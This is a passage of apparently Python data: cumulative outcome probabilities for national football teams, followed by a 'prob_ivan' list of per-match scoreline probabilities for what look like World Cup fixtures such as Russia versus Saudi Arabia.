0.9911910651942757,
0.9933066376113097,
0.9965672834237833,
1.0],
'SWI': [0.004172791453403903,
0.007706143745999988,
0.009742441934362784,
0.010541923539827044,
0.01077942365166592,
0.0206236913549515,
0.03247806476809165,
0.03961552655061013,
0.04248048105144964,
0.07263696906953493,
0.1089511247355736,
0.13081570493712807,
0.2001007292524511,
0.2835330956739992,
0.38965541317763835,
0.4709279997404211,
0.5987194837871311,
0.6489537143116052,
0.6577300873929762,
0.6585925751241172,
0.6586492687701164,
0.7565169434825209,
0.8334595874947024,
0.8923852484013723,
0.9125491090597644,
0.9434336421033037,
0.9670862153252002,
0.9697283215451703,
0.9757986037870715,
0.9850963189250493,
0.9922168697777152,
0.9924358961261438,
0.9931158407815761,
0.9947129661488597,
0.9972687087838774,
1.0],
'TUN': [0.017112039522641107,
0.02695731487333092,
0.03115073340380671,
0.0323672353781048,
0.032634228932956665,
0.06043029528577314,
0.08515566839748659,
0.09615262148706465,
0.09941331989885359,
0.16305330526903739,
0.21966283998265473,
0.24484071676759872,
0.3541200574081898,
0.45132706635846376,
0.5764263439209136,
0.648031045939192,
0.7593103282115901,
0.802544495500978,
0.8100099690895386,
0.8107350895419518,
0.8107821743970712,
0.8744765458049738,
0.9239695520970301,
0.9522985083994544,
0.9651178393056785,
0.9797929739267504,
0.988192771768072,
0.9898529582994129,
0.992703746030271,
0.9959672309993758,
0.9978351943746017,
0.997971134301495,
0.9982864933718342,
0.9988399797957414,
0.9995016062842046,
1.0]}}
prob_ivan = [
('RUS', 'KSA',0.0634155655684838,0.0268152908603409,0.00983144123131035,0.00246662656168457,0.000469120019354206,0.0601096199842504,0.0464721642943523,0.0179643628987102,0.00462955748897301,0.0978060606483139,0.0756161712654772,0.0292303223284381,0.119357253074235,0.0922779061994029,0.0971047790358138,0.0395004822443828,0.0750739939181365,0.0356711123673805,0.00753288376569325,0.000894805009140276,7.17609956005013e-05,0.0305387540471571,0.0290207372839071,0.0118051153525522,0.00919272597261223,0.00747887205272817,0.00304227099489969,0.00145596250675549,0.0017767782919944,0.00144552307460058,0.000588012856926915,0.000147534869363864,0.000243963482254781,0.000305808334348777,0.000262316344575903,0.000141054687400603),
('RUS', 'EGY',0.00598446805593215,0.00431355897412541,0.00213034389512866,0.000715225526545,0.000181525919001555,0.0135345611505279,0.013905705031322,0.00714351319808372,0.00244646738856481,0.0393110140297204,0.0403889981728837,0.0207482713645584,0.0856338713271432,0.087982117936568,0.124361413706764,0.0903016585578727,0.127771644536626,0.0451973790080804,0.00710574305036654,0.000628388565683269,3.70044765582643e-05,0.0927779049338409,0.0656376952504272,0.0476610273907443,0.0154789262265987,0.0224792026609262,0.016322661690921,0.00182514907184319,0.00397584709091734,0.00577390648403028,0.00419256517214736,0.000135424597985559,0.000398071264126253,0.000884558273139803,0.00133619974240661,0.00129589657278291),
('RUS', 'URU',0.00241797272964352,0.00260403544357249,0.00190524800628263,0.000953745891641086,0.000361890260047655,0.00588296440612078,0.0090732110893525,0.00699674125057583,0.00359699101346511,0.0192243477533935,0.0296494340574594,0.0228639470947059,0.0471159845228995,0.072666302861557,0.0769827937654473,0.0628910824632461,0.118729451661356,0.056036095022074,0.0117542451959661,0.00138689683035127,0.000110440698843125,0.0969960087185325,0.0915573597832539,0.0747977721072287,0.028807886844106,0.0470691981541911,0.0384531747654339,0.00453210067649092,0.0111074970172694,0.0181485362301021,0.0148264441027192,0.000455970861822493,0.00151409481460593,0.0038109399339256,0.00656277741634093,0.00815051970037868),
('RUS', 'POR',0.00118825190564983,0.0013894551449494,0.0010598860841211,0.000551597407537166,0.000217338723301953,0.00359070175603931,0.00574031052788731,0.004588401821615,0.00244509783623714,0.0136689183965596,0.0218519502614309,0.0174669171464304,0.0390256576902178,0.0623887498648693,0.0742805399310106,0.070691936267169,0.118749312628366,0.0498691929883464,0.0093078860528911,0.000977219900501315,6.88336448095404e-05,0.113012356236118,0.0949198758033144,0.0903341550425939,0.0265746245885196,0.0505815296840966,0.0481378605492781,0.00372003579884632,0.0106209459643619,0.0202156644501252,0.0192390155515026,0.000330664818060232,0.00127680322850895,0.00373260319765927,0.00744471442019264,0.0107337288321128),
('RUS', 'ESP',0.000236382030836993,0.000379727613675432,0.000381464357075769,0.000261532427529434,0.000135771223904794,0.000965569002548383,0.00203421165101962,0.0021427868076868,0.00150477141055116,0.00477587858938737,0.0100615780381787,0.010598610362847,0.0177167682271049,0.0373247859561286,0.0438151669252291,0.0541794312618663,0.092307564571186,0.039316980072569,0.0074428710352199,0.000792543963037748,5.66589406278055e-05,0.114142469391236,0.097234440434796,0.120234773744286,0.0276103377854373,0.0682828574276938,0.0844348347840559,0.00392006550979823,0.0145420137409883,0.0359637125305724,0.0444707535702599,0.000353696307838101,0.00177488872957583,0.00674407428138375,0.0174889345940213,0.0362999772619761),
('RUS', 'MAR',0.00143421017986236,0.00143212166963352,0.000919856488145299,0.000401522008555247,0.000132479067734835,0.00457277332552374,0.00610645534576343,0.0040772627719888,0.0018149177955183,0.0175345825800789,0.0234155812915982,0.0156345166678321,0.0504280823206547,0.0673413727168054,0.0966848027291252,0.0926859663166396,0.129112332593422,0.0449636419896766,0.0069594147131545,0.000605907711011158,3.51057290086416e-05,0.123772309318802,0.0862079352554379,0.0826424169856178,0.0200147301172282,0.0383738612298626,0.0367867369948,0.00232339065121162,0.00668188903198927,0.0128110587035188,0.0122811995469599,0.000169594803806773,0.000658021240009246,0.00192981603912291,0.00384628118392031,0.00520620370097124),
('RUS', 'IRN',0.00114086847408626,0.000860937189248814,0.000398833273968486,0.000124669014387379,2.93698861606254e-05,0.00458720975466621,0.00435448614751807,0.00206678467118696,0.000653976723826615,0.0199679461654679,0.0189549093288069,0.0089966335216948,0.06518977146098,0.0618824889134294,0.14188427352247,0.154404185057228,0.134686037187593,0.0293714976161011,0.00284673531694413,0.000155199605915419,5.54877565010385e-06,0.146570774154503,0.0639264950333793,0.0695673884366802,0.00929379632655575,0.0202277674933782,0.0220126718613921,0.000675577865753476,0.00220557318752836,0.00480038727548556,0.00522397491158913,3.03399865575008e-05,0.000133040775501048,0.000439673961183643,0.000980446615181464,0.00134960974299174),
('RUS', 'FRA',0.000613714133209332,0.000814422529299921,0.000690142078258948,0.000398908586513794,0.000174549133218621,0.00212967845193659,0.00378037497701518,0.00335525650687948,0.00198529621980264,0.00909548611661241,0.0161453237636713,0.0143297167458519,0.0291339289819533,0.0517154014519712,0.0622129707742418,0.066425193370832,0.110433740711822,0.0458997952009019,0.00847885472483318,0.000881020811437521,6.1388817219897e-05,0.117910822938619,0.0980150195034197,0.104651273564582,0.0271587849439312,0.0579952225128076,0.0619218761305748,0.0037626865931755,0.0120523348154756,0.0257367124805248,0.0274792552416768,0.000330818986537636,0.0014329097747295,0.00469847259778618,0.0105084993168118,0.0175728386196632),
('RUS', 'AUS',0.0192721950322139,0.0125841818810699,0.00632916372565433,0.00218064774196768,0.00056978870052144,0.0268989030134805,0.0285909591255794,0.0151947264041007,0.00538351324000448,0.0577664926381659,0.0614002522340105,0.0326312954294658,0.0930419263764105,0.0988946617138987,0.0999056681302234,0.0536378754894144,0.106190162197076,0.052557779575306,0.0115613145186752,0.00143053981532115,0.000119774676659895,0.0570119273983856,0.056434988917461,0.0302991108057613,0.0186212962763539,0.0199949970770559,0.010735018179673,0.00307214266949618,0.00494816387526774,0.00531319199020577,0.00285257419079105,0.000325154244343835,0.00071012811251255,0.00117617817101356,0.00133452700387708,0.00100278270904824),
('RUS', 'PER',0.00203120817219686,0.00195589295142913,0.00123486474475422,0.000530480132693518,0.00017233949023108,0.00582735728887679,0.00766812391283297,0.00504517926632009,0.00221295622576885,0.0207006620409703,0.027239661777875,0.017922112160096,0.05515159630152,0.0725730813241608,0.0979581737880578,0.0869947966639986,0.128901554794907,0.0477488639140087,0.00786113784863396,0.000727998203630893,4.49783179290094e-05,0.114475026589597,0.0848097212617195,0.0753179052955471,0.0209439823828039,0.0371999072311925,0.0330365322295517,0.00258608560154055,0.00688996075657164,0.0122376870017549,0.0108680577759516,0.000201397871803175,0.00072445142252897,0.00197074126704103,0.00364775258250992,0.00458614043476726),
('RUS', 'DEN',0.00344525617497237,0.0031389246411848,0.00193867285885202,0.000816477905736071,0.000260279452129122,0.00833352334367046,0.0107750320634074,0.00696592012642771,0.00300225205346478,0.026271439803354,0.0339682982286264,0.0219600694363465,0.06211555312905,0.0803138179375417,0.0979096684310198,0.0771650793510277,0.126594691483419,0.0519218539220246,0.00946460228697896,0.000970458736492411,6.66860945020284e-05,0.099772469565855,0.0818418454918623,0.0645016228000346,0.0223778753887373,0.0352731361008723,0.0277996482860223,0.0030593720358105,0.00723350481185487,0.0114018151983851,0.00898605815572745,0.000265231453975007,0.000847841599203606,0.00205144537266142,0.00338470994907049,0.00380280274323954),
('RUS', 'ARG',0.000485555809521672,0.000654921112298251,0.000557404114261357,0.000323240517245291,0.000141838865290983,0.00181104474940773,0.00322164304111909,0.00286546864393752,0.00169911448797814,0.00814155758538849,0.0144829068124435,0.0128817236467359,0.0274502990350767,0.0488309661547094,0.0617014544790513,0.0693447725280818,0.109759883909202,0.0434323730418282,0.00763837472959514,0.000755632952754145,5.00141493763265e-05,0.12335647914064,0.0976251874244854,0.109718587221647,0.025753753906459,0.0578880423959516,0.065058970909772,0.00339695040681736,0.0114532512355881,0.0257440641665417,0.0289331311336152,0.000283570998047375,0.00129198930910112,0.00445420150559389,0.0104629763734415,0.0183310561245003),
('RUS', 'ICE',0.0141746692771877,0.0102803379023644,0.00562968821816368,0.002113352266409,0.000601826142019015,0.0213450030110848,0.0247370776019443,0.0143341045200798,0.00553734373151183,0.0487545454389374,0.0565024504022884,0.0327408129100653,0.0835209193829696,0.0967937771238221,0.0953858956366544,0.0544682048139783,0.110544294665572,0.0560879559223731,0.0126479568275914,0.00160432984623981,0.000137897153636139,0.0631241049074699,0.0640558072110452,0.0365777854619754,0.0216670871002087,0.024745112052876,0.0141302005128205,0.00366448167502822,0.00627758654716055,0.00716938007461181,0.00409393086563576,0.000398274150190688,0.000925537534516769,0.0016316145013996,0.00197174920171237,0.00160909515143618),
('RUS', 'CRO',0.00254162125443365,0.00234329667794641,0.00143090394659591,0.000594658657455713,0.000186909655767795,0.00689433504650186,0.00877849694840701,0.00558879196858092,0.00237205342794988,0.0234350543594226,0.0298396512197833,0.0189972843941858,0.059744895895481,0.0760726571545847,0.101541691371603,0.0862895058403294,0.129292153895826,0.0484313268926184,0.00806302575266715,0.000755078758076962,4.71975098724426e-05,0.10987167849976,0.0823132884297062,0.0699493270867278,0.0205557293278474,0.0349362651326399,0.0296886235937299,0.00256664516908812,0.00654335791485601,0.0111210107569123,0.00945056665588801,0.000202242816025841,0.000696226385733318,0.00181273608406152,0.00321212724651233,0.00383812465151363),
('RUS', 'NGA',0.00509330784292345,0.00370413641305568,0.00182180386626603,0.000608577930025305,0.000153630224691079,0.0122380537878951,0.0124993787004292,0.00638314190330153,0.0021731480438189,0.0370065201010187,0.0377967377121027,0.0193019146055584,0.0839277155740448,0.0857198635178024,0.126894061231188,0.0959283990134249,0.12960368974133,0.0437751400193183,0.00657135915235304,0.000554888073760892,3.11442608884299e-05,0.0979768031891372,0.0661855891110785,0.050034473950824,0.0149032970505757,0.0225329603641348,0.0170342945271985,0.00167792011796508,0.00380538353868794,0.0057535293134531,0.00434950895543341,0.000118620195006898,0.000362810739916224,0.000838585836875549,0.00131648175273331,0.00132162787718666),
('RUS', 'BRA',0.000158634202685787,0.000262468995931728,0.000267086496703522,0.000185185229317819,9.71576703859223e-05,0.00072527127821907,0.00154260175846511,0.00164050353066711,0.00116307911589964,0.00389586402296286,0.00828623285251372,0.00881212158347604,0.0156952545977202,0.0333827190860958,0.0421542804429317,0.0566089370706816,0.0896592338494016,0.0355013652898327,0.00624759068719688,0.000618447173941064,4.09616359944955e-05,0.120403287008006,0.0953494891858556,0.128044724671579,0.0251696480883146,0.0676005857412998,0.0907807526059223,0.00332204813208153,0.0133835244021805,0.035945440543939,0.0482710927656449,0.000277506880667606,0.00151077458180816,0.00622360355461923,0.0174688639012935,0.0392268381055052),
('RUS', 'SWI',0.00281565426255874,0.00265007305726706,0.00167166379455689,0.000718687853592823,0.00023382861150347,0.00721808030553078,0.00952219760972261,0.00628091150836396,0.00276195692022597,0.0237450912317716,0.0313248732902805,0.020662116583894,0.0585851085474688,0.0772863361119151,0.0963627923491628,0.0792504100406678,0.127123211731283,0.0509786351660006,0.00908592261002365,0.000910903539123156,6.11377687994645e-05,0.104548305521144,0.0838514045043498,0.0689608304974919,0.0224172548829757,0.0368726683432898,0.030324713660341,0.00299657065650123,0.00739329301655356,0.0121607414818291,0.0100012019716227,0.000253691124126728,0.000845971143196973,0.00213487181040891,0.00367187877710022,0.00431502725699789),
('RUS', 'CRC',0.00598750286988913,0.00390361082414493,0.00171978679746007,0.000513750926228317,0.000115898037750142,0.0143345567687395,0.0130697575149075,0.00595827845444789,0.00181085135411502,0.0425638593650136,0.0388082680039692,0.0176920242658477,0.094789229618641,0.0864255704677408,0.140729689236167,0.104467804581743,0.128312506841935,0.0393999363679052,0.00537699376485667,0.000412768048493808,2.09888527913968e-05,0.0952501633657544,0.058495472779849,0.0434229170294466,0.011974503821755,0.0177780556754465,0.013197175778802,0.00122563965178021,0.00272948553339598,0.00405235544623406,0.00300818312859702,7.84433411982148e-05,0.000235349141808264,0.000533230045553607,0.000819193534285613,0.000784546548928382),
('RUS', 'SRB',0.00617924934734026,0.00527753969506819,0.00319231534491418,0.00132053622664637,0.000413972864970344,0.0121842157077548,0.0155205970036515,0.00988528671551826,0.00419738550972026,0.03350607085417,0.0426809763858975,0.0271841146815163,0.069105193822824,0.0880281414831349,0.0950181602228607,0.0653239667866709,0.121036807638656,0.0560663624853006,0.0115426302081506,0.00133668695892899,0.000104365702138819,0.0832115080275986,0.0770900466236993,0.0529985808335811,0.0238063036764621,0.032733157262299,0.0225036947969747,0.00367583183275508,0.00758128496678183,0.0104241043229796,0.00716646000067764,0.000362533922945816,0.00101275377551253,0.00214405593930471,0.00310412077673762,0.00307687006931989),
('RUS', 'GER',0.000504914535354747,0.000769756993462491,0.00076245610841075,0.000517468960492534,0.000266367171573763,0.0016305650864843,0.00341474394687605,0.00357559361456342,0.00249601334593043,0.00684618105823029,0.0143373334321877,0.0150126857730857,0.0215585667833393,0.0451481428352292,0.0452584974307651,0.0475062097187635,0.094780748973125,0.0472748216974589,0.0104799001472815,0.0013067933526522,0.000110311086649293,0.0994879280936533,0.0992453449172612,0.104174253165672,0.0330011177452409,0.0692801621599269,0.0727208833645936,0.00548677508926587,0.0172778087785014,0.0362717833736224,0.0380731806321421,0.000585532430734795,0.00250048822992194,0.00809889210623549,0.0179735830834829,0.032196390276966),
('RUS', 'MEX',0.00323611068992974,0.00301556935545349,0.00190238356591255,0.000818585073180569,0.000266646066879932,0.00789398579495253,0.0104312999134046,0.00689208346137196,0.0030357874750571,0.0251208906386811,0.0331953402438947,0.0219325546565452,0.0599563227188803,0.0792277057789253,0.0953989698766311,0.0758966114065603,0.12606245970816,0.0523466840388404,0.00966073250498491,0.00100289037908854,6.98122878245013e-05,0.100291581028582,0.0832909609413105,0.0662638360185287,0.0230573829606888,0.0366875499155326,0.029187534446114,0.00319148022178827,0.00761714307349525,0.0121199494842524,0.00964227493717177,0.000280321219998752,0.000904701699448481,0.00221034702385493,0.00368343059801101,0.00420585620367347),
('RUS', 'SWE',0.00258254814686605,0.00264468704054167,0.00183107189605257,0.000866106216678599,0.000310336240987,0.00639916649280551,0.00931102075707798,0.00677393748359314,0.00328544207477623,0.0209348697682936,0.030460999440858,0.0221609328647757,0.0513663114612058,0.0747398575685653,0.0840224302748605,0.0687198339579596,0.122255702086972,0.0543746100358819,0.0107483219953788,0.00119510952671772,8.94058938850963e-05,0.0999898660434746,0.0889432538661668,0.0727444518965835,0.0263723472565437,0.0431385599922019,0.0352819440017622,0.00390980017925952,0.00959318190090144,0.0156920447361946,0.0128341289963236,0.000369311849981206,0.00122657088321579,0.00308594115056649,0.00530416807741726,0.00643790031681003),
('RUS', 'KOR',0.011635198946516,0.00781250229294594,0.00380535007225833,0.0012641506399717,0.000317901972462521,0.0205398600693181,0.0209526561496076,0.010686874161803,0.00363388388675652,0.0506505398084273,0.0516684797664848,0.0263534387933164,0.0936767767974228,0.095559428682374,0.115501743835895,0.0712057635051966,0.117823019003358,0.0487399584095904,0.00896102406950206,0.00092672880085177,6.42547322764431e-05,0.0726368083112359,0.0600954727869285,0.0370483066392384,0.0165731669358322,0.0204344101859051,0.0125976260681663,0.00228527915286411,0.00422656078162935,0.00521127175161331,0.00321270113838202,0.000199922389642291,0.000499959991675861,0.000946453432679983,0.00122197692318519,0.00102238458060429),
('RUS', 'BEL',0.00154800161249288,0.00194864756542327,0.00166202268741938,0.000972669476692325,0.000431994990420857,0.00388682949717492,0.00702954524192306,0.0063566598874686,0.00383212318239979,0.0133898038626731,0.0242161978295033,0.0218981638316757,0.0345950692481817,0.0625670883182068,0.0595885659745857,0.051319411581958,0.107769203852169,0.0565780127875309,0.0132013451650582,0.00173265146457293,0.00015440645082095,0.0928139826474124,0.0974532706818599,0.0839296000219797,0.0341081508615291,0.0587498693326122,0.0505971015639555,0.0059688399735227,0.015421617398816,0.0265630936944132,0.0228769112983035,0.00067286693158199,0.00235975131446415,0.00628041542500746,0.0114692547070163,0.0160362558752388),
('RUS', 'TUN',0.00665604667827372,0.0045788014968351,0.00216453367704135,0.000695230344460568,0.000168772467680726,0.0148146735759609,0.0145537746398456,0.00714873517736867,0.00234094663415743,0.0422883003268866,0.0415435675787203,0.0204059751021775,0.0905335680550572,0.0889391953226995,0.129213468523168,0.0922095572198933,0.126937910017163,0.0436864504215651,0.00668220287182685,0.000574930145823721,3.29038734370655e-05,0.090585668900317,0.0623512130108798,0.0444951893139963,0.0143056983557602,0.0204177184651534,0.0145705304611853,0.00164113090638902,0.00351344072597696,0.00501453629197465,0.00357848277297162,0.000118318678784437,0.000341689899759561,0.000745795022069981,0.00110600899798889,0.0010426724224201),
('RUS', 'PAN',0.0180617416648857,0.00935718582008285,0.00355598591227264,0.000918128621531182,0.000179162038297864,0.0303709874019293,0.0239826726695049,0.00946904657331091,0.00249243399580292,0.0698831449351038,0.0551837372922454,0.0217881211869291,0.12059997954768,0.0952326572450281,0.138749289550028,0.0798149610922045,0.109564392832131,0.0376005826865144,0.0057350498311033,0.000492042190468017,2.80773546970049e-05,0.0630264686712823,0.0432591626796947,0.0248846563276725,0.00989719184759467,0.0113866382278379,0.00655011704977562,0.00113218102709687,0.00195384750985308,0.00224788557094262,0.00129308697699546,8.13838444181142e-05,0.000189447090265635,0.000333301026654838,0.000398395184362924,0.000292381587873968),
('RUS', 'ENG',0.00042865015910705,0.000510812691203424,0.000373795968640767,0.00018551930611638,6.95400442241279e-05,0.00184461051230037,0.00279498784020551,0.00211750854036783,0.00106949598707402,0.00896535254792829,0.0135844673916369,0.010291717661292,0.0326806983531204,0.0495183963754412,0.0794189288997485,0.0964998697309214,0.120337024578767,0.0375155933496321,0.00519806675109731,0.000405130006997069,2.0926333296928e-05,0.146218380888974,0.0911684385894351,0.110776392597255,0.0189481061234174,0.0460466993924225,0.0559501438066076,0.00196905163244669,0.00717762989215405,0.0174427018637827,0.0211941722323538,0.000128030342567763,0.000628847011366149,0.00233275134334945,0.00586912634599286,0.0103139450528493),
('RUS', 'POL',0.00481464572504266,0.00496298720058467,0.00368670655665596,0.00188420112629591,0.000731631067163761,0.00888907476047855,0.0140796517673168,0.0111505752415472,0.00588723500988972,0.024494714350057,0.038797856636559,0.0307264999721762,0.050623184689465,0.0801834646446219,0.0697485667446378,0.0480497482800959,0.110476687112606,0.0635024054872759,0.0162228515075669,0.00233123865658491,0.00022876013186695,0.0761073274238679,0.0874935426276345,0.0602742521546491,0.0335277397531852,0.0461944820010216,0.0318233525888064,0.00642395598119415,0.0132763789536589,0.0182921799419919,0.0126014724420771,0.000798331604231667,0.00224341503785454,0.00478974202218667,0.00703570935375757,0.00763579864332773),
('RUS', 'SEN',0.00539902859128808,0.00383588629325329,0.00184631729093186,0.000603461448753742,0.000149038510555075,0.0128467390844322,0.0128350211476834,0.00641165694962664,0.00213526955489879,0.038466811801851,0.0384317249471513,0.0191983350481676,0.0863854788639792,0.0863066838039497,0.129331417725308,0.0968138154166828,0.129213450250249,0.0431139803077537,0.00639360787003518,0.000533330476181727,2.95575273234612e-05,0.096725508325054,0.0645477951886177,0.0483186408906259,0.014358218205516,0.0214963063346868,0.0160915226186344,0.00159694401206724,0.00358628039963412,0.00536917471020197,0.00401921125180473,0.000111464220736116,0.00033753863979363,0.00077235557241518,0.00120008955184355,0.00118673624597062),
('RUS', 'COL',0.000599412828623664,0.000700497399508874,0.000510632328764873,0.000252785442683691,9.4562254713733e-05,0.00233312492105278,0.00353088114448184,0.0026717647100593,0.00134778947498213,0.0105298105403694,0.0159354988481199,0.0120581525453316,0.0356421903352401,0.0539398197958236,0.0804297935544128,0.0907485150373811,0.121720032628042,0.0408154511863605,0.00608281523711207,0.000509926022499272,2.84061518891997e-05,0.137336075639975,0.0921037198295709,0.103920144943527,0.0205896257700038,0.0464623339494006,0.0524232081762899,0.00230138744739763,0.00778993022911516,0.0175786749983078,0.0198339269805778,0.000161467640188159,0.000737033824134252,0.00254220954591322,0.00595493800892341,0.00977899939743532),
('RUS', 'JPN',0.0152136988908174,0.0116103960845491,0.00684034831100714,0.00277198472658658,0.000853360509580935,0.0210034563214047,0.0263712517063007,0.0165554398741588,0.00692882265580642,0.0462629569115379,0.0580862531729406,0.0364655983200836,0.0764253207703369,0.0959571291471393,0.084168559394326,0.0463481626188074,0.105679285903171,0.0602403139519082,0.0152616702255137,0.00217490068644533,0.000211530781004049,0.0581932346677399,0.0663437247195957,0.0365327595502187,0.0252119215965008,0.0277663358027252,0.0152897787056562,0.00479051329477402,0.00791381571021801,0.00871562540957979,0.00479933631648976,0.000590004257499187,0.00132506151721082,0.00226071610910854,0.00265300123583089,0.0021619868128713),
('KSA', 'EGY',0.000387786906748217,0.000496482471887303,0.000392371225726309,0.000210622807734838,8.54408870876254e-05,0.00163689369813704,0.00268661766747685,0.00220475969191327,0.00120621686217344,0.00793926246293467,0.0130306340747305,0.0106935263308302,0.0288802604563299,0.0474008899121642,0.0700375253511183,0.0849240082984331,0.114951907511663,0.0388993092334224,0.00585039350259061,0.000494937993898422,2.78336484118987e-05,0.139384946833866,0.0943347225242796,0.114385577136249,0.0212816856623206,0.051610220113601,0.0625799775083204,0.00240054845400778,0.00873235579670686,0.021176837771655,0.0256779767365936,0.000170039895676538,0.000834210323595821,0.00309280397209443,0.00778832820833633,0.0141031890887318),
('KSA', 'URU',7.46818490355243e-05,0.000143965020631063,0.000169243301928265,0.000135711913868852,8.23827557160541e-05,0.000376207499497214,0.000926458574313943,0.00114076073851125,0.000936422558337187,0.00222771477108351,0.00548602952773253,0.00675502096808269,0.00989356892393714,0.0243641654469874,0.0292924113156213,0.0433637935552016,0.0721362696436334,0.029999920276087,0.00554503131376042,0.000576514762140534,4.01960278645314e-05,0.106788829057603,0.0888223462047992,0.131490502519999,0.0246261999965982,0.0729120891547841,0.107937333929911,0.00341383532514528,0.0151612834473727,0.0448888115327779,0.0664523359061146,0.000300335739610632,0.00180367953058792,0.00820018389820477,0.0254296150993582,0.0678595150020539),
('KSA', 'POR',3.24431214613006e-05,7.05568241834948e-05,9.21662575299133e-05,8.20845671620785e-05,5.53327017126122e-05,0.000188640406054226,0.000515717531695419,0.000704951229858895,0.000642413990782677,0.00126518408484091,0.00345884334656766,0.00472800655629483,0.00636405583253436,0.0173984738168079,0.0213414037924805,0.0357834318097367,0.0583445313598907,0.0237825452132781,0.00430857828403815,0.000439068390201898,2.99771031064925e-05,0.0978270960846214,0.0797530559073316,0.133723070207952,0.0216727613688816,0.0726780474342857,0.121860304023014,0.0029447685734968,0.0148126046163336,0.0496730048657738,0.0832874256859061,0.000253640181297196,0.0017247806471919,0.00887729169045857,0.0311518426711144,0.0995807791508852),
('KSA', 'ESP',5.72266558471428e-06,1.61506521441748e-05,2.68954258102996e-05,3.05557348071745e-05,2.6281466775966e-05,4.18452459619204e-05,0.000146025926803404,0.000254790846709297,0.00029637830755101,0.000348505959765689,0.00121616935452132,0.00212201234646205,0.00217688535221057,0.00759660252422887,0.00906503835181661,0.0188744253886543,0.0316339549787096,0.013254802291843,0.0024683713562298,0.000258565316379934,1.81698151686054e-05,0.0658654381615553,0.0551959665672283,0.114924185899229,0.0154182770728095,0.0642051602956595,0.13368233652582,0.00215344782126768,0.0134511588324605,0.0560136391973097,0.116626671917473,0.000190957860027196,0.00161312718821013,0.0103167342291507,0.0450134003414866,0.212203634729603),
('KSA', 'MAR',8.0664097612042e-05,0.000137584917535734,0.000140357101270082,9.72676707047222e-05,5.09421934360866e-05,0.000450146059845246,0.00095394289102777,0.00101079085270153,0.000714017689119257,0.00279966692776387,0.00593301286232309,0.00628657667728469,0.0130593194169734,0.0276751171025812,0.0406109793378781,0.0631446245444461,0.0860621884602589,0.0293243499981368,0.00444080685889554,0.000378283939016125,2.14260627940423e-05,0.133815157043695,0.0911908602467614,0.141789553614534,0.0207145766749203,0.0644167753676894,0.100159443610433,0.00235272309999067,0.0109745063449424,0.0341277700764868,0.0530641039234672,0.00016785701123051,0.00105606878658799,0.00502134344288341,0.0162187809995,0.0414838346268935),
('KSA', 'IRN',4.40945012914024e-05,5.92815150352852e-05,4.52988478022193e-05,2.33308456268765e-05,9.05228525999337e-06,0.000349584885903483,0.000546178591179943,0.000426664689310493,0.000222201748712683,0.0027536237291249,0.00430216061866111,0.00336076890117455,0.0162673872942261,0.0254155686724739,0.0640677922165853,0.126162914955755,0.1000971663933,0.0198541756971173,0.00175024731497466,8.67899635849245e-05,2.81605055509957e-06,0.197112306419087,0.0781940689176295,0.153980515413258,0.0103398117296224,0.0407225141610284,0.0801911680289234,0.000683630536714097,0.00403863555839639,0.0159058402627256,0.0313219342034168,2.7850449722519e-05,0.000220840358053607,0.00131919531241795,0.00531147594843879,0.0147772901402103),
('KSA', 'FRA',1.48855993378956e-05,3.55530420306222e-05,5.02471281562042e-05,4.8370748480799e-05,3.5229891884974e-05,9.9972964065253e-05,0.000295123162952298,0.000435606176756544,0.000428640795999069,0.00075691105539391,0.00223442394481382,0.00329804296659339,0.00429801960310673,0.0126878816844113,0.0162704916489614,0.0307966136668581,0.0480309752054191,0.0187275020245671,0.00324530697192067,0.00031634009421554,2.06176514311654e-05,0.090912519385249,0.0708944335843364,0.134188230407095,0.0184280476338861,0.0697608254083063,0.132042548899737,0.00239506067280158,0.0136000361587716,0.0514840077944083,0.0974483827701124,0.00019684950510622,0.00151018044157206,0.0087655726909473,0.03465523385083,0.130612303435969),
('KSA', 'AUS',0.000904095481729793,0.00117690070474476,0.00100135567499817,0.000582505084448992,0.000256769430673397,0.00274833279884672,0.00492191246451803,0.00440725779617075,0.00263094497270245,0.0107309896537836,0.019217829716887,0.0172083372989296,0.0314247256549317,0.0562776636657584,0.0613496309503655,0.0598856018517915,0.109869340930944,0.0503930481757312,0.0102726435799883,0.00117792147115873,9.10182665386592e-05,0.107247452100118,0.0983809673310516,0.096033233584535,0.0300825009311427,0.0587292423951517,0.0573277454591185,0.00459924763306618,0.0134684777221119,0.0262941400599025,0.0256666646281298,0.000448867691464991,0.00178012204317495,0.00534950317747236,0.0109910690954055,0.017053223477166),
('KSA', 'PER',9.45364177498724e-05,0.000158038707051548,0.000158631910190464,0.000108189325784111,5.57690108561102e-05,0.000510291841462171,0.00106450371391973,0.00111031380954667,0.00077206353818508,0.00308744392028561,0.00644061937232944,0.00671778645543591,0.0140100857779664,0.0292259980097777,0.0423829568134188,0.0641079239883449,0.0884137492880697,0.0304837162742737,0.00467125414001046,0.000402644348293461,2.30875115766423e-05,0.133733518023207,0.0922185667411802,0.139488636741029,0.0211970396489576,0.0641247477176046,0.0969942817002904,0.00243613897806784,0.0110546189440165,0.0334421533685328,0.0505841778711789,0.000175971347428519,0.00107716553650874,0.00498353608387018,0.0156660511073823,0.0387581689229721),
('KSA', 'DEN',0.000129510007567426,0.000215545771126887,0.000218540633733418,0.000150810151264859,7.87134155963813e-05,0.000631632726786177,0.00133556944668547,0.00141201181578704,0.000995219616057272,0.00355278241538844,0.0075122574298157,0.00794222740004908,0.014987660972679,0.0316909831038038,0.0421509970061788,0.0592723091299455,0.0891270850312361,0.0335048414798131,0.00559787136009953,0.000526090897281079,3.30063054559699e-05,0.125329612845171,0.0942283439345546,0.132502951939026,0.0236150116456451,0.0664143849391157,0.0933912418301616,0.00295913496798413,0.0124833177175294,0.0351078322826985,0.0493682815530401,0.000234042433230451,0.00133328277583751,0.0057447315338851,0.0168470122989076,0.0393019036826893),
('KSA', 'ARG',2.01310496674589e-05,4.61190196146527e-05,6.27891021256798e-05,5.82336516705574e-05,4.08639914291378e-05,0.000128917534012193,0.000366692059204354,0.000521508060613429,0.000494457861772629,0.000935557465626366,0.0026610925829693,0.00378459581335985,0.00509202129599249,0.0144837068816668,0.0184764569656741,0.0335210167201263,0.0525542945221312,0.020598673182999,0.00358829190740866,0.000351608051054635,2.30418361568871e-05,0.0953469265597658,0.0747425190297609,0.135602038570254,0.0195302367626657,0.0708656853730785,0.12856847114614,0.00255162759401982,0.0138879144526863,0.0503924549431815,0.0914247968567154,0.000210876792935541,0.00155077942940506,0.00862875789199411,0.0327063500850218,0.115437747115433),
